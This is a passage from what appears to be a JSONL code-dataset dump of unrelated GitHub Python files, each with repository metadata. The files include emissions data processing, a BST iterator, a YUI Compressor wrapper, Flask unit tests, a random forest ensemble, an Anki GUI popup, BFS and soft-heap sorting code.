fugitive_production_ch4.append(sum(df.iloc[111:131,10].apply(lambda x:float(x))))\n fugitive_gatherboostprocesss_ch4.append(sum(df.iloc[131:136,10].apply(lambda x:float(x))))\n fugitive_transmissionstorage_ch4.append(sum(df.iloc[136:141,10].apply(lambda x:float(x))))\n fugitive_2ndproduction_ch4.append(sum(df.iloc[147:157,10].apply(lambda x:float(x))))\n \n venting_ch4_miq= [sum(x) for x in zip(venting_production_ch4, venting_2ndproduction_ch4)]\n fugitive_ch4_miq= [sum(x) for x in zip(fugitive_production_ch4, fugitive_2ndproduction_ch4)]\n\n venting_ch4_uponly = [sum(x) for x in zip(venting_production_ch4,venting_gatherboostprocesss_ch4,venting_2ndproduction_ch4)]\n fugitive_ch4_uponly = [sum(x) for x in zip(fugitive_production_ch4,fugitive_gatherboostprocesss_ch4,fugitive_2ndproduction_ch4)]\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n #Field_name.append(df.iloc[0,7].strip())\n original_file.append((file.split('-')[0]))\n\n\n\n\nvff = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n 'venting_ch4(t/d)':venting_ch4,'fugitive_ch4(t/d)':fugitive_ch4,\n 'venting_co2(t/d)':venting_co2,'fugitive_co2(t/d)':fugitive_co2,\n 'venting_ch4_miq(t/d)':venting_ch4_miq,'fugitive_ch4_miq(t/d)':fugitive_ch4_miq,\n 'venting_ch4_uponly(t/d)':venting_ch4_uponly,'fugitive_ch4_uponly(t/d)':fugitive_ch4_uponly,\n 'ch4_production(t/d)': [sum(x) for x in zip(venting_production_ch4,fugitive_production_ch4)],\n 'ch4_gatherboostprocess(t/d)': [sum(x) for x in zip(venting_gatherboostprocesss_ch4,fugitive_gatherboostprocesss_ch4)],\n 'ch4_transmissionstorage(t/d)': [sum(x) for x in zip(venting_transmissionstorage_ch4,fugitive_transmissionstorage_ch4)],\n 'ch4_2ndproduction(t/d)':[sum(x) for x in zip(venting_2ndproduction_ch4,fugitive_2ndproduction_ch4)]})\n\n\n# merge flaring and vff to calculate methane emission \nch4_co2 = vff.merge(flaring,how ='outer',indicator = True)\n\n\nif ch4_co2[ch4_co2['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: vff // flaring. Check the merge')\n print(ch4_co2[ch4_co2['_merge']!='both'])\n ch4_co2.drop(columns = '_merge',inplace = True)\nelse:\n ch4_co2.drop(columns = '_merge',inplace = True)\n\nch4_co2['tCH4/year'] = (ch4_co2['flaring_ch4(t/d)']+ch4_co2['venting_ch4(t/d)']+ch4_co2['fugitive_ch4(t/d)'])*365\nch4_co2['tCH4/year-miQ']=(ch4_co2['flaring_ch4(t/d)']+ch4_co2['venting_ch4_miq(t/d)']+ch4_co2['fugitive_ch4_miq(t/d)'])*365\n\n\n\n\n# merge results, energy summary, flaring and vff \nresults_ES_ch4_co2 = results_ES.merge(ch4_co2,how='outer',indicator = True)\n\n\nif results_ES_ch4_co2[results_ES_ch4_co2['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: results_ES // ch4_co2. Check the merge')\n print(results_ES_ch4_co2[results_ES_ch4_co2['_merge']!='both'])\n results_ES_ch4_co2.drop(columns = '_merge',inplace = True)\nelse:\n results_ES_ch4_co2.drop(columns = '_merge',inplace = True)\n\n# results_ES_ch4_co2['Field Methane Intensity(kgCH4/boe)']=results_ES_ch4_co2['tCH4/year']*1000/results_ES_ch4_co2['annual production(boe/yr)']\n\n#results_ES_ch4_co2['fugitive intensity(kgCH4/boe)']= results_ES_ch4_co2['fugitive_ch4(t/d)']*1000*365/results_ES_ch4_co2['annual production(boe/yr)']\n#results_ES_ch4_co2['venting intensity(kgCH4/boe)']= results_ES_ch4_co2['venting_ch4(t/d)']*1000*365/results_ES_ch4_co2['annual production(boe/yr)']\n#results_ES_ch4_co2['flaring intensity(kgCH4/boe)']= results_ES_ch4_co2['flaring_ch4(t/d)']*1000*365/results_ES_ch4_co2['annual production(boe/yr)']\n\n# Extract data from allocation.csv files\n# Commenting out as we are not using allocation sheet anymore.\n\n# list_allocation=[]\n# for filename in list_csv:\n# if filename.endswith('Allocation.csv'):\n# list_allocation.append(filename)\n\n# allocation_crude = [] #Allocation!H24\n# allocation_NGL = [] #H14\n# allocation_petcoke = [] #H30 \n# allocation_gas = [] #H33\n \n# Field_name = []\n# original_file = []\n# for file in list_allocation:\n# df = pd.read_csv(d+file,header=None)\n# allocation_crude.append(float(df.iloc[23,7]))\n# allocation_NGL.append(float(df.iloc[13,7]))\n# allocation_petcoke.append(float(df.iloc[16,7]))\n# allocation_gas.append(float(df.iloc[14,7]))\n# Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n# original_file.append((file.split('-')[0]))\n\n# allocation = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n# 'allocation_crude(mmbtu/d)':allocation_crude,'allocation_NGL(mmbtu/d)':allocation_NGL,\n# 'allocation_petcoke(mmbtu/d)':allocation_petcoke, 'allocation_gas(mmbtu/d)':allocation_gas})\n\n# merge results, energy summary, flaring, vff, allocation tabs\n#results_ES_ch4_co2_allo = pd.merge(results_ES_ch4_co2,allocation,left_on=['original_file','Field name'],right_on=['original_file','Field_name'],how='left')\n\nprint('Extract data from flow sheet.csv files...')\nlist_FS=[]\nfor filename in list_csv:\n if filename.endswith('Flow Sheet.csv'):\n list_FS.append(filename)\n\nFS_LPG_export_LPG = [] #Flow Sheet!W9\nFS_LPG_export_C2 = [] #W17\nFS_LPG_export_C3 = [] #W18\nFS_LPG_export_C4 = [] #W19 \nFS_Ethane_to_Petchem = [] #CP17\nFS_Petcoke_to_stock =[]\nFS_Gas_at_Wellhead =[] #AF24\n \nField_name = []\noriginal_file = []\nfor file in list_FS:\n df = pd.read_csv(d+file,header=None)\n FS_LPG_export_LPG.append(float(df.iloc[8,22]))\n FS_LPG_export_C2.append(float(df.iloc[16,22]))\n FS_LPG_export_C3.append(float(df.iloc[17,22]))\n FS_LPG_export_C4.append(float(df.iloc[18,22]))\n FS_Ethane_to_Petchem.append(float(df.iloc[16,93]))\n FS_Petcoke_to_stock.append(float(df.iloc[6,214]))\n FS_Gas_at_Wellhead.append(float(df.iloc[23,31]))\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n original_file.append((file.split('-')[0]))\n\nflowsheet = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n 'FS_LPG_export_LPG(t/d)':FS_LPG_export_LPG,'FS_LPG_export_C2(t/d)':FS_LPG_export_C2,\n 'FS_LPG_export_C3(t/d)': FS_LPG_export_C3, 'FS_LPG_export_C4(t/d)':FS_LPG_export_C4,\n 'FS_Ethane_to_Petchem(t/d)':FS_Ethane_to_Petchem,\n 'FS_Petcoke_to_stock(t/d)':FS_Petcoke_to_stock,'FS_Gas_at_Wellhead(t/d)':FS_Gas_at_Wellhead})\n\nresults_ES_ch4_co2_fs =results_ES_ch4_co2.merge(flowsheet,how='outer',indicator = True)\nif results_ES_ch4_co2_fs[results_ES_ch4_co2_fs['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: results_ES_ch4_co2 // flowsheet. Check the merge')\n print(results_ES_ch4_co2_fs[results_ES_ch4_co2_fs['_merge']!='both'])\n results_ES_ch4_co2_fs.drop(columns = '_merge',inplace = True)\nelse:\n results_ES_ch4_co2_fs.drop(columns = '_merge',inplace = True)\n\n\n\n\nresults_ES_ch4_co2_fs['GWP']='100yr'\n#results_ES_ch4_co2_fs.to_excel('../Upstream/Analytics/all_upstream_results.xlsx',index = False)\n\n\nprint('Update upstream results in OCI database...')\nimport sqlite3\nconnection = sqlite3.connect(\"../OCI_Database.db\")\nresults_ES_ch4_co2_fs.to_sql('upstream_results', connection, if_exists='replace', index=False)\nprint('Upstream data updates completed.')","repo_name":"RMI/oci_data_processing","sub_path":".ipynb_checkpoints/upstream_data_processing-checkpoint.py","file_name":"upstream_data_processing-checkpoint.py","file_ext":"py","file_size_in_byte":21679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71641123038","text":"# Implement an iterator over a binary search tree (BST). \n# Your iterator will be initialized with the root node of a BST.\n\n# Calling next() will return the next smallest number in the BST.\n\n# Note: next() and hasNext() should run in average O(1) \n# time and uses O(h) memory, where h is the height of the tree.\n\n\nclass BSTIterator(object):\n def __init__(self, root):\n \"\"\"\n :type root: TreeNode\n \"\"\"\n self.stack = []\n \n while root:\n self.stack.append(root)\n root = root.left\n\n \n# return a boolean, whether we have a next smallest number\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n if len(self.stack) > 0:\n return True\n return False\n \n# @return an integer, the next smallest number\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n node = self.stack.pop()\n node_right = node.right\n while node_right:\n self.stack.append(node_right)\n node_right = node_right.left\n return node.val\n ","repo_name":"Gabrielatb/Interview-Prep","sub_path":"leetcode/company specific problems/Amazon/binary_search_tree_iterator.py","file_name":"binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13171605100","text":"\"\"\"Minify Javascript and CSS with YUI Compressor. This filter defaults to\r\nJS mode, but it is recommended that you use the 'yui_js' and 'yui_css'\r\nfilters instead.\r\n\r\nYUI Compressor is an external tool, which needs to be available (also, java\r\nis required).\r\n\r\nYou can define a YUI_COMPRESSOR_PATH setting that points to the .jar file.\r\nOtherwise, we will attempt to find the path via an environment variable by\r\nthe same name. The filter will also look for a JAVA_HOME environment\r\nvariable to run the .jar file, or will otherwise assume that \"java\" is\r\non the system path.\r\n\r\nFor more information, see:\r\n http://developer.yahoo.com/yui/compressor/\r\n\"\"\"\r\n\r\nimport os\r\nimport subprocess\r\n\r\nfrom courant.core.assets.conf import settings\r\n\r\n\r\ndef _get_yui_path():\r\n path = getattr(settings, 'YUI_COMPRESSOR_PATH', None)\r\n if not path:\r\n path = os.environ.get('YUI_COMPRESSOR_PATH')\r\n if not path:\r\n raise EnvironmentError('YUI Compressor was not found on '\r\n 'your system. Define a YUI_COMPRESSOR_PATH setting or '\r\n 'environment variable.')\r\n return path\r\n\r\n\r\ndef _get_java_path():\r\n path = os.environ.get('JAVA_HOME')\r\n if path:\r\n return os.path.join(path, 'bin/java')\r\n else:\r\n return 'java'\r\n\r\n# fail early\r\nyui = _get_yui_path()\r\n\r\n\r\ndef apply(_in, out, mode='js'):\r\n java = _get_java_path()\r\n proc = subprocess.Popen(\r\n [java, '-jar', yui, '--type=%s'%mode],\r\n # we cannot use the in/out streams directly, as they might be\r\n # StringIO objects (which are not supported by subprocess)\r\n stdout=subprocess.PIPE,\r\n stdin=subprocess.PIPE,\r\n stderr=subprocess.PIPE)\r\n stdout, stderr = proc.communicate(_in.read())\r\n if proc.returncode:\r\n raise Exception('yui compressor: subprocess returned a '\r\n 'non-success result code: %s' % proc.returncode)\r\n # stderr contains error messages\r\n else:\r\n out.write(stdout)\r\n","repo_name":"maxcutler/Courant-News","sub_path":"courant/core/assets/filter/yui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"786282889","text":"from random import randint\r\nb = [randint(-10,20) for i in range(10)]\r\ndef negative(b):\r\n if len(b) == 0:\r\n return 0\r\n else:\r\n count = negative(b[1:])\r\n if b[0] < 0:\r\n count+=1\r\n return count\r\n\r\nprint(b)\r\nprint(negative(b))","repo_name":"E-bait/Proj_1sem_Semerunin","sub_path":"zd1-8/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41205905466","text":"import unittest\nfrom flask import url_for\nfrom flask_testing import TestCase\n\nfrom application import app, db\nfrom application.models import Fish, Catches\n\nclass TestBase(TestCase):\n\n\tdef create_app(self):\n\t\tapp.config.update(\n\t\t\tSQLALCHEMY_DATABASE_URI=\"sqlite:///test.db\",\n\t\t\tSECRET_KEY='TEST_SECRET_KEY',\n\t\t\tDEBUG=True\n\t\t)\n\t\treturn app\n\n\tdef setUp(self):\n\t\tdb.create_all()\n\t\ttest_fish = Fish(name=\"test fish\", minweight=1800, maxweight=2500)\n\t\tdb.session.add(test_fish)\n\t\tdb.session.commit()\n\t\ttest_catch = Catches(fishname=\"test fish\", fishweight=2030, fishid=test_fish.id, description=\"Jeeez what a catch\")\n\t\tdb.session.add(test_catch)\n\t\tdb.session.commit()\n\n\tdef tearDown(self):\n\t\tdb.session.remove()\n\t\tdb.drop_all()\n\nclass TestViews(TestBase):\n\n# Test each route allows get requests and provides the right status code of 200\n\tdef test_home_get(self):\n\t\tresponse = self.client.get(url_for('home'))\n\t\tself.assertEqual(response.status_code, 200)\n\n\tdef test_create_get(self):\n\t\tresponse = self.client.get(url_for('create'))\n\t\tself.assertEqual(response.status_code, 200)\n\n\tdef test_update_get(self):\n\t\tresponse = self.client.get(url_for('update', id=1))\n\t\tself.assertEqual(response.status_code,200)\n\n# Follow redirects since the delete function works largely on the home page, without redirects being allowed the 302\n# status code is returned, since the delete function redirects immediately to the home page once it has finished.\n\tdef test_delete_get(self):\n\t\tresponse = self.client.get(\n\t\t\turl_for('delete', id=1)\n\t\t\t,follow_redirects = True\n\t\t)\n\t\tself.assertEqual(response.status_code,200)\n\t\t\nclass TestRead(TestBase):\n\n# read the database to ensure that the fish is present by looking for test_fish (it is present within the catch too)\n\tdef test_read_fish(self):\n\t\tresponse = self.client.get(url_for('home'))\n\t\tself.assertIn(b\"test fish\", response.data)\n\n# read the database to ensure that the catch has been entered, since the fish table should only be storing 1800 and 2500, the 2030\n# can only be present in the catch table.\n\tdef test_read_catch(self):\n\t\tresponse = self.client.get(url_for('home'))\n\t\tself.assertIn(b\"2030\", response.data)\n\nclass TestCreate(TestBase):\n\n# Create a catch and search for the information on the home page, the catch description is only present in the Catches table.\n\tdef test_create_catch(self):\n\t\tresponse = self.client.post(\n\t\t\turl_for('create'),\n\t\t\tdata=dict(fishname=\"test fish\", fishweight=2000, description=\"Blimey What a catch\"),\n\t\t\tfollow_redirects = True\n\t\t)\n\t\tself.assertIn(b\"Blimey What a catch\", response.data)\n\n\n# Ensure that the database is correctly updating when the fish min weight and max weight values are eclipsed by new values, tried to use python logic to test routes, couldn't quite figure it out\n# but the tests here show that the code within routes.py is in fact working.\n\n\tdef test_create_sbcatch(self):\n\n\t\tresponse = self.client.post(\n\t\t\turl_for('create'),\n\t\t\tdata=dict(fishname=\"test fish\", fishweight=2000, description=\"Blimey What a catch\"),\n\t\t\tfollow_redirects = True\n\t\t)\n\t\tfish = Fish(name=\"carp\", minweight=4, maxweight=505)\n\t\tdb.session.add(fish)\n\t\tdb.session.commit()\n\t\tnew_catch = Catches(fishid=fish.id,fishname=\"carp\", fishweight=2, description=\"heaviest catch yet!\")\n\t\tdb.session.add(new_catch)\n\t\tdb.session.commit()\n\t\tif fish.minweight > new_catch.fishweight:\n\t\t\tfish.minweight = new_catch.fishweight\n\t\t\tdb.session.commit()\n\t\tself.assertTrue(fish.minweight == new_catch.fishweight)\n\t\nclass TestUpdate(TestBase):\n# Update catch description from previous value to new value, search for new value on home page.\n\n\tdef test_update_catch(self):\n\t\tresponse = self.client.post(\n\t\t\turl_for('update', id=1),\n\t\t\tdata=dict(fishname=\"test fish\", fishweight=2000, description=\"That catch was easy!\"),\n\t\t\tfollow_redirects = True \n\t\t)\n\t\tself.assertIn(b\"That catch was easy!\", response.data)\n\nclass TestDelete(TestBase):\n\n# Delete the catch and ensure that the data from the catch is no longer present on the home page, and as a result no longer\n# present on the home page.\n\n\tdef test_delete_catch(self):\n\t\tresponse = self.client.get(\n\t\t\turl_for('delete', id=1),\n\t\t\tfollow_redirects = True \n\t\t)\n\t\tself.assertNotIn(b\"Jeeez what a catch\", response.data)\n\n","repo_name":"Bkirkb/QA-Fundamental","sub_path":"Program/tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27474095612","text":"class results:\n physics=0\n chemistry=0\n maths=0\nshafeeq=results()\nadam=results()\n\nshafeeq.physics=98\nshafeeq.chemistry=78\nshafeeq.maths=99\n\nadam.physics=34\nadam .chemistry=97\nadam.maths=102\ntotal1 = shafeeq.physics + shafeeq.chemistry + shafeeq.maths\ntotal2 = adam.physics + adam.chemistry + adam.maths\n\nprint(\"shafeeq's results:\",total1)\nprint(\"adam's results:\",total2)\n\ntotal1= shafeeq.physics\n\n\n\n\n","repo_name":"adatia111/pythonProject","sub_path":"objects1.py","file_name":"objects1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7952754855","text":"from mapsys import *\nimport matplotlib.pyplot as plt\nfrom optparse import OptionParser\nimport numpy as np\nimport csv\n\n\nclass Vessel:\n time = []\n x = []\n y = []\n z = []\n phi = []\n the = []\n psi = []\n out = []\n\n\ndef get_vessel_column_index(name,out_chanel):\n index = [0,0,0,0,0,0,0]\n fp = open(name) \n for i,line in enumerate(fp):\n if i==6:\n words = line.split()\n for j in range(0,len(words)):\n if words[j]=='PtfmTDxi':\n index[0] = j;\n if words[j]=='PtfmTDyi':\n index[1] = j;\n if words[j]=='PtfmTDzi':\n index[2] = j;\n if words[j]=='PtfmRDxi':\n index[3] = j;\n if words[j]=='PtfmRDyi':\n index[4] = j;\n if words[j]=='PtfmRDzi':\n index[5] = j;\n if words[j]==out_chanel:\n index[6] = j;\n fp.close()\n return index\n\n\ndef set_vessel_prescribed_motion(table,index):\n vessel = Vessel()\n N = 1000#len(table)\n vessel.time = [float(table[i][0]) for i in range(8,N)]\n vessel.x = [float(table[i][index[0]]) for i in range(8,N)]\n vessel.y = [float(table[i][index[1]]) for i in range(8,N)]\n vessel.z = [float(table[i][index[2]]) for i in range(8,N)]\n vessel.phi = [float(table[i][index[3]]) for i in range(8,N)]\n vessel.the = [float(table[i][index[4]]) for i in range(8,N)]\n vessel.psi = [float(table[i][index[5]]) for i in range(8,N)] \n vessel.out = [float(table[i][index[6]]) for i in range(8,N)] \n return vessel\n\n\n\n","repo_name":"hfchen20/foamMooring","sub_path":"map-plus-plus/python_driver/fast_driver_support.py","file_name":"fast_driver_support.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"17487893063","text":"from flask import request\n\nimport re\nimport typing\n\n\nclass Rule(typing.NamedTuple):\n\n rule_source: str # \"\" if directly from _echo_response, or name of file otherwise\n after: int # eg: 200, represents number of milliseconds after start/reset of echo server\n selector_type: str # one of { PATH, HEADER, PARAM, JSON, BODY }\n selector_target: str # name of header, parameter, or json field\n pattern: str # eg: /test/ or /Test/i or !/test/\n status_code: int # eg: 200\n delay: int # eg: 200, represents number of milliseconds to delay\n location: list # list of values, each one of { file, text }\n headers: list # [ {},... ]\n values: list # [ [...],... ]\n\n def unique_id(self, request_path):\n after = str(self.after or 0)\n selector_type = \"\" if self.selector_type is None else self.selector_type\n selector_target = \"\" if self.selector_target is None else self.selector_target\n pattern = \"\" if self.pattern is None else self.pattern\n return \":\".join((request_path, self.rule_source, selector_type, selector_target, pattern, after))\n\n def rule4location(self, location, headers, values):\n return Rule(\n self.rule_source,\n self.after,\n self.selector_type,\n self.selector_target,\n self.pattern,\n self.status_code,\n self.delay,\n location,\n headers,\n values,\n )\n\n def at_offset(self, offset):\n locations = self.location[offset]\n values = self.values[offset]\n\n rules = []\n while locations and locations[0] == \"file\":\n headers = self.headers[offset]\n rule = self.rule4location(locations.pop(0), headers, values.pop(0))\n rules.append(rule)\n\n if values:\n headers = self.headers[offset]\n rule = self.rule4location(locations.pop(0), headers, values)\n rules.append(rule)\n\n return rules\n\n def _text(self, headers, params, json):\n value = None\n\n if self.selector_type == \"HEADER\":\n header_name = self.selector_target\n value = headers.get(header_name, \"\")\n\n elif self.selector_type == \"PATH\":\n value = request.path\n\n elif self.selector_type == \"PARAM\":\n param_name = self.selector_target\n value = params.get(param_name, \"\")\n\n elif self.selector_type == \"JSON\":\n json_path = self.selector_target\n fmt = \"{json.\" + json_path + \"}\"\n value = fmt.format(json=json)\n\n elif self.selector_type == \"BODY\":\n body = request.get_data().decode()\n value = body\n\n return value\n\n def _matches(self, text):\n # set case-sensitive flag\n flags = 0\n if self.pattern[-1] == \"i\":\n flags = re.IGNORECASE\n\n # determine match polarity\n is_positive = True\n if self.pattern[0] == \"!\":\n is_positive = False\n\n # parse pattern text from pattern spec, eg: parse \"dog\" from \"!/dog/i\"\n pattern = re.sub(r\".*/(.*)/.*\", r\"\\1\", self.pattern)\n\n got_match = False\n text_match = re.search(pattern, text, flags)\n if is_positive and text_match:\n got_match = True\n elif not is_positive and not text_match:\n got_match = True\n\n return got_match\n\n def apply(self, headers, params, json, millis_since_reset):\n if self.selector_type is None:\n value = True\n else:\n text = self._text(headers, params, json)\n value = self._matches(text)\n\n if millis_since_reset <= int(self.after or 0):\n value = False\n\n return value\n\n","repo_name":"psamuels00/echo-api","sub_path":"src/echoapi/rule.py","file_name":"rule.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10821171787","text":"import os\nimport cv2\n\nimport numpy as np\nfrom naturalnets.environments.anki.constants import IMAGES_PATH\nfrom naturalnets.environments.anki.pages.name_exists_popup import NameExistsPopup\nfrom naturalnets.environments.anki.pages.profile_page_popups.five_profiles_popup import FiveProfilesPopup\nfrom naturalnets.environments.anki.profile import ProfileDatabase\nfrom naturalnets.environments.app_components.bounding_box import BoundingBox\nfrom naturalnets.environments.app_components.page import Page\nfrom naturalnets.environments.app_components.reward_element import RewardElement\nfrom naturalnets.environments.app_components.utils import put_text, render_onto_bb\nfrom naturalnets.environments.app_components.widgets.button import Button\n\n\nclass AddProfilePopup(Page, RewardElement):\n \"\"\"\n Adds a new profile to the present profiles\n State description:\n state[0]: if this popup is open\n state[i]: if the text field is filled with name[i] as name = {Alice, Bob, Carol, Dennis, Eva}\n \"\"\"\n STATE_LEN = 6\n IMG_PATH = os.path.join(IMAGES_PATH, \"add_profile_popup.png\")\n\n WINDOW_BB = BoundingBox(160, 305, 498, 109)\n OK_BB = BoundingBox(451, 381, 82, 24)\n TEXT_BB = BoundingBox(566, 345, 86, 20)\n CANCEL_BB = BoundingBox(549, 381, 101, 24)\n TEXT_X = 191\n TEXT_Y = 359\n\n def __init__(self):\n Page.__init__(self, self.STATE_LEN, self.WINDOW_BB, self.IMG_PATH)\n RewardElement.__init__(self)\n # Popups warning that the profile cannot be created\n self.name_exists_popup = NameExistsPopup()\n self.five_profiles_popup = FiveProfilesPopup()\n # Contains the current profiles\n self.profile_database = ProfileDatabase()\n self.add_child(self.name_exists_popup)\n self.add_child(self.five_profiles_popup)\n self.profile_iterate_index = 0\n\n self.current_field_string = None\n\n self.text_button: Button = Button(\n self.TEXT_BB, self.set_current_field_string)\n self.ok_button: Button = Button(self.OK_BB, self.add_profile)\n self.cancel_button: Button = Button(self.CANCEL_BB, self.close)\n\n self.add_children([self.name_exists_popup, self.five_profiles_popup])\n self.set_reward_children(\n [self.name_exists_popup, self.five_profiles_popup])\n\n \"\"\"\n Provide reward for opening/closing this popup, setting a profile name and adding profile\n \"\"\"\n @property\n def reward_template(self):\n return {\n \"window\": [\"open\", \"close\"],\n \"profile_name_clipboard\": 0,\n \"add_profile\": 0\n }\n\n \"\"\"\n Delegate click to the popup if one is open else handle click with the buttons.\n \"\"\"\n\n def handle_click(self, click_position: np.ndarray) -> None:\n if self.name_exists_popup.is_open():\n self.name_exists_popup.handle_click(click_position)\n return\n if self.five_profiles_popup.is_open():\n self.five_profiles_popup.handle_click(click_position)\n return\n if self.text_button.is_clicked_by(click_position):\n self.text_button.handle_click(click_position)\n elif self.ok_button.is_clicked_by(click_position):\n self.ok_button.handle_click(click_position)\n elif self.cancel_button.is_clicked_by(click_position):\n self.cancel_button.handle_click(click_position)\n\n \"\"\"\n Close this popup\n \"\"\"\n\n def close(self):\n self.get_state()[0:6] = 0\n self.register_selected_reward([\"window\", \"close\"])\n for child in self.get_children():\n child.close()\n self.current_field_string = None\n\n \"\"\"\n Open this popup\n \"\"\"\n\n def open(self):\n self.get_state()[0] = 1\n self.get_state()[1:6] = 0\n self.register_selected_reward([\"window\", \"open\"])\n\n \"\"\"\n Set the current string by selecting a name from the predefined set of names\n \"\"\"\n\n def set_current_field_string(self):\n self.register_selected_reward([\"profile_name_clipboard\"])\n self.current_field_string = self.profile_database.get_profile_names()[\n self.profile_iterate_index]\n self.get_state()[1 + (self.profile_iterate_index - 1) % 5] = 0\n self.profile_iterate_index += 1\n self.profile_iterate_index %= 5\n self.get_state()[1 + (self.profile_iterate_index - 1) % 5] = 1\n\n \"\"\"\n Adds the profile if the current_field_string is set and the max number of decks is not exceeded\n and the name of the profile is not present\n \"\"\"\n\n def add_profile(self):\n if self.current_field_string is None:\n return\n elif not (self.profile_database.is_adding_allowed()):\n self.five_profiles_popup.open()\n elif self.profile_database.is_included(self.current_field_string):\n self.name_exists_popup.open()\n else:\n self.profile_database.create_profile(self.current_field_string)\n self.current_field_string = None\n self.register_selected_reward([\"add_profile\"])\n self.close()\n\n \"\"\"\n Renders the image of this popup\n \"\"\"\n\n def render(self, img: np.ndarray):\n to_render = cv2.imread(self._img_path)\n img = render_onto_bb(img, self.get_bb(), to_render)\n put_text(img, \"\" if self.current_field_string is None else self.current_field_string,\n (self.TEXT_X, self.TEXT_Y), font_scale=0.5)\n if self.five_profiles_popup.is_open():\n img = self.five_profiles_popup.render(img)\n if self.name_exists_popup.is_open():\n img = self.name_exists_popup.render(img)\n return img\n \"\"\"\n Returns true if the popup is open\n \"\"\"\n\n def is_open(self) -> int:\n return self.get_state()[0]\n\n def reset_iterate_index(self):\n self.profile_iterate_index = 0\n","repo_name":"neuroevolution-ai/NaturalNets","sub_path":"naturalnets/environments/anki/pages/profile_page_popups/add_profile_popup.py","file_name":"add_profile_popup.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"38597094970","text":"import random\nfrom sheap_simplified import SoftHeap\n\ndef randlist(n):\n\treturn [ random.random() for i in range(n) ]\n\ndef randperm(n):\n\treturn random.sample(list(range(n)),n)\n\ndef build(lst, eps):\n\tP = SoftHeap(eps)\n\tfor it in lst:\n\t\tP.insert(it)\n\treturn P\n\ndef extract(P):\n\tlst = [];\n\twhile P.heap != SoftHeap.null:\n\t\tlst.append(P.find_min()[0].key)\n\t\tP.delete_min()\n\treturn lst\n\t\t\ndef sort(lst, eps):\n\tprint(lst)\n\tP = build(lst, eps)\n\tlst1 = extract(P)\n\tif P.eps == 0:\n\t\tfor i in range(1,len(lst)):\n\t\t\tif lst1[i]\",end=\" \")\n for i in graph[s]:\n if i not in visited:\n queue.append(i)\n visited.add(i)\n print(visited)\n\naddEdge(0, 1)\naddEdge(0, 2)\naddEdge(0, 3)\naddEdge(1, 0)\n\naddEdge(2, 0)\n\naddEdge(3, 0)\naddEdge(3, 4)\naddEdge(4, 3)\n\n# addEdge(1,2)\n# addEdge(1,3)\n# addEdge(2,4)\n# addEdge(2,5)\n# addEdge(3,1)\n# addEdge(3,5)\n# addEdge(4,2)\n# addEdge(4,5)\n# addEdge(4,6)\n# addEdge(5,2)\n# addEdge(5,3)\n# addEdge(5,4)\n# addEdge(6,4)\n# addEdge(6,5)\nprint(len(graph))\nprint(graph)\n\nBFS(0)","repo_name":"anurag1009/leetcode","sub_path":"coding/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11769380773","text":"import numpy as np\nimport scipy.stats as stat\nfrom tqdm import tqdm\nfrom utils.resampling import Bootstrap\nfrom Trees.DecisionTree import DecisionTree\n\n\nclass Ensamble():\n \"\"\"\n Class Ensambel learning Object\n currently a bootstrap learning\n using utils.resampling.Bootstrap().__iter__()\n Args:\n models: list of estimators\n random_state:\n\n \"\"\"\n\n def __init__(self, models,random_state):\n self.models = models\n self.n_estimator = len(self.models)\n self.random_state = random_state\n\n def fit(self, X, y):\n self.resample_generator = Bootstrap(X,y,self.n_estimator, self.random_state)\n for model, (Xi, yi) in tqdm(zip(self.models, self.resample_generator),total = self.n_estimator):\n model.fit(Xi, yi)\n\n def predict(self,X):\n \"\"\"\n hard voting\n soft to be updated...\n \"\"\"\n preds = [model.predict(X) for model in self.models]\n preds = stat.mode(preds,axis=0)[0][0]\n return preds\n\n\n\nclass RandomForest(Ensamble):\n def __init__(self, max_depth = 2, n_estimator = 3, max_features=0.5 ,random_state = None):\n self.max_depth = max_depth\n self.n_estimator = n_estimator\n self.max_features = max_features\n self.random_state = random_state\n self.models = [DecisionTree(max_depth = max_depth,\n max_features= max_features,\n splitter = 'quantile') for _ in range(n_estimator)]\n super().__init__(self.models, random_state)\n","repo_name":"AllenLeong/PracticeMLfromScratch","sub_path":"Trees/Ensamble.py","file_name":"Ensamble.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5684684166","text":"import collections\nimport copy\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport multiprocessing\nimport functools\nfrom abc import ABC, abstractmethod\n\nfrom rl.tools.utils.misc_utils import unflatten, flatten, cprint\n\ntf_float 